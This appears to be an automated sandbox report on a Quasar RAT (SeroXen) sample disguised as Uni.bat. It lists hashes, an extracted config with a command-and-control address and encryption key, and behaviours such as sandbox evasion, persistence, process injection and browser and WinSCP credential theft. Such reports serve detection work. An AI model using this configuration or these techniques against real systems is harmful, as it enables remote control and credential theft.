quasar | 91c8ec0b835f0470ee1a8b3c0c18b412c2883e3621e684cf273f3120252a8146

Analysis

max time kernel
101s
max time network
148s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
28-11-2024 17:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Uni.bat
Size

10.4MB
MD5

2c35e3c096365f1e1ad3bcc4de8574f7
SHA1

5e96223c4626c43a1c3306dbb76d94881ba6abbd
SHA256

91c8ec0b835f0470ee1a8b3c0c18b412c2883e3621e684cf273f3120252a8146
SHA512

ccccc2f5a9d80a8fc1c8431dda01973f8b81832e1e77a1e42579beb3521febbd51d9d11f58782ee68d381235f902853a1f6597de2e6ca4b15cda2a66896f4f7c
SSDEEP

49152:PqzgPmL6ky1xm3CCeGx8pb8y2qsqnnjh3WhZKEP7ciaTCfuoeKPtyT5YAv6cKoTW:a

Score

10^/10

quasar v15.4.5 | seroxen defense_evasion discovery persistence spyware stealer trojan

Malware Config

Extracted

Family

quasar

Version

1.4.0

Botnet

v15.4.5 | SeroXen

147.185.221.23:58175

Mutex

a00acb06-91e4-48b0-99a0-b2768c5ea752

Attributes

encryption_key
E9B24DC5A9D33874B0626389429DD789286126DC
install_name
.exe
log_directory
$sxr-Logs
reconnect_delay
230
startup_key
$sxr-seroxen

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral2/memory/1136-50-0x00000240183B0000-0x0000024018A60000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 8 IoCs

description	pid	Process	procid_target
PID 3476 created 624	3476	Uni.bat.exe	5
PID 1136 created 624	1136	$sxr-powershell.exe	5
PID 1136 created 624	1136	$sxr-powershell.exe	5
PID 3476 created 624	3476	Uni.bat.exe	5
PID 3476 created 624	3476	Uni.bat.exe	5
PID 1136 created 624	1136	$sxr-powershell.exe	5
PID 1136 created 624	1136	$sxr-powershell.exe	5
PID 1136 created 624	1136	$sxr-powershell.exe	5

Detected Nirsoft tools 1 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/files/0x002800000004505a-1354.dat	Nirsoft

Boot or Logon Autostart Execution: Active Setup 2 TTPs 2 IoCs

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

persistence

Active Setup

T1547.014

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation	Uni.bat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation	$sxr-powershell.exe

Deletes itself 1 IoCs

pid	Process
3476	Uni.bat.exe

Executes dropped EXE 12 IoCs

pid	Process
3476	Uni.bat.exe
1136	$sxr-powershell.exe
3724	$sxr-powershell.exe
4144	$sxr-powershell.exe
3392	$sxr-powershell.exe
2140	$sxr-powershell.exe
1540	$sxr-powershell.exe
3764	$sxr-powershell.exe
5076	$sxr-powershell.exe
4556	$sxr-powershell.exe
1932	$sxr-powershell.exe
1340	$sxr-powershell.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Enumerates connected drives 3 TTPs 4 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\D:	explorer.exe
File opened (read-only)	\??\F:	explorer.exe
File opened (read-only)	\??\D:	explorer.exe
File opened (read-only)	\??\F:	explorer.exe

Hide Artifacts: Hidden Window 1 TTPs 11 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
4144	$sxr-powershell.exe
3392	$sxr-powershell.exe
5076	$sxr-powershell.exe
1136	$sxr-powershell.exe
3724	$sxr-powershell.exe
3764	$sxr-powershell.exe
4556	$sxr-powershell.exe
1932	$sxr-powershell.exe
1340	$sxr-powershell.exe
2140	$sxr-powershell.exe
1540	$sxr-powershell.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
27	api.ipify.org
28	api.ipify.org

Drops file in System32 directory 20 IoCs

description	ioc	Process
File created	C:\Windows\System32\vcruntime140d.dll	Uni.bat.exe
File opened for modification	C:\Windows\System32\vcruntime140_1d.dll	Uni.bat.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File created	C:\Windows\System32\ucrtbased.dll	Uni.bat.exe
File opened for modification	C:\Windows\System32\ucrtbased.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File created	C:\Windows\System32\vcruntime140_1d.dll	Uni.bat.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	Uni.bat.exe
File opened for modification	C:\Windows\System32\vcruntime140_1d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\System32\ucrtbased.dll	Uni.bat.exe

Suspicious use of SetThreadContext 8 IoCs

description	pid	Process	procid_target
PID 3476 set thread context of 4540	3476	Uni.bat.exe	88
PID 1136 set thread context of 2220	1136	$sxr-powershell.exe	92
PID 1136 set thread context of 2044	1136	$sxr-powershell.exe	104
PID 3476 set thread context of 1636	3476	Uni.bat.exe	106
PID 3476 set thread context of 3136	3476	Uni.bat.exe	107
PID 1136 set thread context of 5476	1136	$sxr-powershell.exe	113
PID 1136 set thread context of 1668	1136	$sxr-powershell.exe	140
PID 1136 set thread context of 2324	1136	$sxr-powershell.exe	117

Drops file in Windows directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\$sxr-seroxen1\$sxr-Uni.bat	attrib.exe
File opened for modification	C:\Windows\$sxr-seroxen1\$SXR-N~1.EXE	cmd.exe
File created	C:\Windows\$sxr-powershell.exe	Uni.bat.exe
File opened for modification	C:\Windows\$sxr-powershell.exe	Uni.bat.exe
File created	C:\Windows\$sxr-seroxen1\$sxr-nircmd.exe	Uni.bat.exe
File created	C:\Windows\$sxr-seroxen1\$sxr-Uni.bat	Uni.bat.exe
File opened for modification	C:\Windows\$sxr-powershell.exe	attrib.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 5 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5752	cmd.exe
5728	PING.EXE
4964	cmd.exe
6072	PING.EXE
2216	PING.EXE

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe

Checks processor information in registry 2 TTPs 11 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mousocoreworker.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	mousocoreworker.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
5292	taskkill.exe
2232	taskkill.exe
2984	taskkill.exe
2036	taskkill.exe
716	taskkill.exe

Modifies data under HKEY_USERS 54 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Thu, 28 Nov 2024 17:33:05 GMT"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={E1987803-54E8-45BF-BF4C-F9B5C1E26FB3}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	svchost.exe
